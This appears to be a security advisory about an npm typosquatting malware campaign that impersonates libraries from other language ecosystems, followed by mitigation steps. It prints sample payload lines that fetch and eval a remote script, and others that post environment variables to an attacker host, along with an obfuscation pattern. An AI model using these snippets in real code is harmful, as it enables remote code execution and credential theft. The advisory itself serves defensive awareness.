A coordinated malware operation targeting npm employs cross-ecosystem typosquatting to mimic popular libraries from Python, Java, C++, and .NET ecosystems. Attackers uploaded packages like beautifulsoup4 (masquerading as Python’s BeautifulSoup) and apache-httpclient (impersonating Java’s Apache HttpClient), leveraging developers’ familiarity with tools from other languages.

Technical breakdown

Payload obfuscation:
Packages use layered obfuscation, including numeric array manipulation and junk math operations to evade static analysis:

(function() {  
  const _0xabc = ["charCodeAt", ...]; // Obfuscated string array  
  (function(_0x1a2, _0x3f4f) {  
    while (true) {  
      try {  
        const _0xresult = parseInt(...); // Junk math  
        if (_0xresult === _0x3f4f) break;  
        else _0x1a2.push(_0x1a2.shift());  
      } catch (e) { /* ... */ }  
    }  
  })(_0xabc, 123456);  
})();  

Malicious behavior:

  • Remote code execution: fetch and execute attacker-controlled scripts via HTTPS:

    https.get('https://malicious-domain.tld/payload.js', res => {
      eval(data); // Executes arbitrary code
    });

  • Data exfiltration: harvest environment variables (API keys, credentials):

    const envDump = JSON.stringify(process.env);
    require('https').post('https://exfil-server.com/env', envDump);

  • Discord token theft: target local Discord directories to extract tokens.

Infrastructure:
All packages connect to 8[.]152[.]163[.]60 (Alibaba Cloud, Singapore), confirming a single threat actor.

Mitigation steps

  1. Dependency auditing: use tools like Socket's socket fix command to automate vulnerability detection:

    npx @socketsecurity/cli fix

  2. Code inspection: manually review obfuscated postinstall scripts in dependencies.
  3. Network monitoring: block traffic to known malicious IPs like 8[.]152[.]163[.]60.

This campaign underscores the risks of cross-ecosystem dependency confusion. Developers must verify package origins, even for seemingly familiar tools.